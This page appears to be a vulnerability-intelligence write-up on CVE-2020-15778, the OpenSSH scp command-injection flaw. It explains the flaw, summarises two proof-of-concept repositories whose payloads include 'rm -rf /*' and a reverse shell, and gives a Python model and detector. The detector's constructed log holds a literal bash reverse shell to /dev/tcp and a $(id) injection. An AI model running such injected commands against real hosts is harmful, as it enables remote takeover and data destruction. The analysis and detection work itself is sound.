CVE-2020-15778 is a command injection issue in scp in OpenSSH through 8.3p1. The flaw is in scp.c, in the toremote function, which builds the remote side of a local-to-remote copy as the command line "scp -t <destination>" and hands it to the target host over ssh without quoting the destination. The remote sshd runs that string through the user's login shell before scp ever sees the path, so shell metacharacters in the destination argument are interpreted there. Public descriptions note exploitation via backtick characters in the destination argument: the enclosed text is executed as a command on the remote host, as the authenticated user, in the context of an ordinary scp transfer. The issue has been publicly described as disputed because the vendor reportedly stated that validation of "anomalous argument transfers" was intentionally omitted, since such validation stands a great chance of breaking existing workflows. Two caveats matter in practice. First, exploitation requires valid SSH credentials for the target; a user who already has an interactive login there gains nothing new. The issue therefore matters mainly for accounts that are meant to be limited to file transfer (for example via a forced command or an scp-only wrapper) while still having the remote command line evaluated by a shell. Second, the change that removes the remote shell from the path is not a scp.c fix: OpenSSH 9.0 later switched scp to the SFTP protocol by default, and using sftp instead of scp on affected versions achieves the same effect.
2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (2 hidden).
This repository is a minimal Docker-based reproduction of CVE-2020-15778 (OpenSSH scp command injection via a crafted remote path). It contains a README with step-by-step exploitation instructions and two Dockerfiles that build a vulnerable lab environment.

Structure and purpose:
- server/Dockerfile: builds an Ubuntu 20.04 container running openssh-server (pinned to 1:8.2p1-4ubuntu0.9, a version inside the affected range), enables root password login, sets the root password to "PASSWORD", adjusts PAM, exposes TCP/22, and runs sshd in the foreground.
- client/Dockerfile: builds an Ubuntu 20.04 container with openssh-client (same pinned version) and netcat, dropping into /bin/bash for interactive use.
- README.md: describes how to build and run both containers, obtain their internal Docker IPs, and exploit the vulnerability by embedding backtick-delimited shell commands in the scp destination path (e.g., root@<server_ip>:'`<cmd>`/tmp'). It provides example payloads including destructive deletion and a reverse shell that redirects bash to /dev/tcp with a netcat listener on the client.

Exploit capabilities:
- Authenticated remote command execution on the scp server by injecting shell commands into the remote path argument.
- Demonstrated post-exploitation actions: filesystem destruction (rm -rf /*) and an interactive shell callback to the client (reverse shell).

No standalone exploit script is included; exploitation is performed manually with the scp client inside the provided containerized environment, making this a proof-of-concept reproduction rather than a weaponized tool.
This repository contains two Python exploit scripts (CVE-2020-15778.py and CVE-2020-15778-Update.py) targeting CVE-2020-15778, the command injection vulnerability in OpenSSH's scp utility. Both scripts automate exploitation by generating a bash reverse shell payload, writing it to a file (shell.sh), and using scp to transfer it to the /tmp directory of the target system. The exploit then triggers execution of the payload via a crafted scp command whose destination path carries the injected command, resulting in a reverse shell connection from the target to the attacker's machine (as specified by lhost and lport). The 'Update' version adds a host status check using nmap before attempting exploitation. The README provides usage instructions and example commands. The exploit requires valid SSH credentials (the examples use root) and a netcat listener on the attacker's machine. The repository is operational and provides a working exploit for the specified vulnerability.
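The mechanism described in the advisory text and exercised by both repositories above comes down to one unquoted string. The following is an added example written for this page, not code from OpenSSH or from either repository: it models how toremote builds the remote command (the "scp -t <path>" format is modelled on scp.c, not copied from it), shows that a backtick or $(...) destination reaches the remote shell intact, shows what quoting the path would have prevented, and runs a detection pass over a constructed process-execution log that flags remote-side scp invocations carrying shell metacharacters. The log lines, user names and addresses are made up for the example.

```python
"""Added example for CVE-2020-15778 (not OpenSSH or PoC-repository code).

Models the unquoted remote command line that scp's toremote builds, a
client-side quoting fix for comparison, and a detection over constructed
exec records of the kind an auditd/EDR pipeline produces.
"""
import re
import shlex

# Tokens a POSIX shell interprets before scp sees the path: backticks,
# command substitution, separators, pipes and redirections.
_SHELL_META = re.compile(r"[`;&|<>]|\$\(")


def remote_scp_command(dest_path: str) -> str:
    """Approximation of the string scp builds for a local-to-remote copy.

    scp passes it to ssh as one argument; the remote sshd runs it through
    the user's login shell (sh -c), so dest_path is never quoted.
    The exact format string is an assumption modelled on scp.c.
    """
    return f"scp -t {dest_path}"


def shell_would_expand(dest_path: str) -> bool:
    """True when the remote shell would interpret part of the destination,
    i.e. the CVE-2020-15778 condition."""
    return _SHELL_META.search(dest_path) is not None


def quoted_remote_scp_command(dest_path: str) -> str:
    """Illustrative client-side hardening: single-quote the path so the
    remote shell treats it literally. This is not the upstream change;
    upstream kept scp as-is and moved it to the SFTP protocol in 9.0."""
    return f"scp -t {shlex.quote(dest_path)}"


# Constructed sample exec records: "<timestamp> <user> <argv>".
# The root line mirrors the reverse-shell payload used by the PoC repos.
SAMPLE_EXEC_LOG = """\
2024-05-01T10:00:01Z alice sh -c scp -t /home/alice/upload
2024-05-01T10:00:02Z root sh -c scp -t `bash -i >& /dev/tcp/10.0.0.5/4444 0>&1`/tmp
2024-05-01T10:00:03Z bob sh -c scp -t $(id)/tmp/x
2024-05-01T10:00:04Z carol sh -c scp -f /var/log/syslog
"""

# Remote-side scp runs as "scp -t <path>" (sink) or "scp -f <path>" (source).
_EXEC_LINE = re.compile(r"\S+ (\S+) sh -c scp -[tf] (.*)$")


def find_scp_injections(log_text: str) -> list[tuple[str, str]]:
    """Return (user, path) for remote-side scp invocations whose path argument
    would be expanded by the shell. Legitimate paths with odd characters will
    also match; treat hits as triage candidates, not verdicts."""
    hits = []
    for line in log_text.splitlines():
        m = _EXEC_LINE.match(line)
        if m and shell_would_expand(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    payload = "`id`/tmp"
    print("remote shell receives:", remote_scp_command(payload))
    print("expands:", shell_would_expand(payload))
    print("quoted form:", quoted_remote_scp_command(payload))
    for user, path in find_scp_injections(SAMPLE_EXEC_LOG):
        print(f"suspect scp path for {user}: {path}")
```

The detection keys on the sh -c record rather than on the later scp process, because by the time scp itself executes the shell has already substituted the backtick or $(...) expression and the argv looks benign. Filesystem paths containing ';' or '&' do occur, so the hits are meant for triage alongside the originating ssh session.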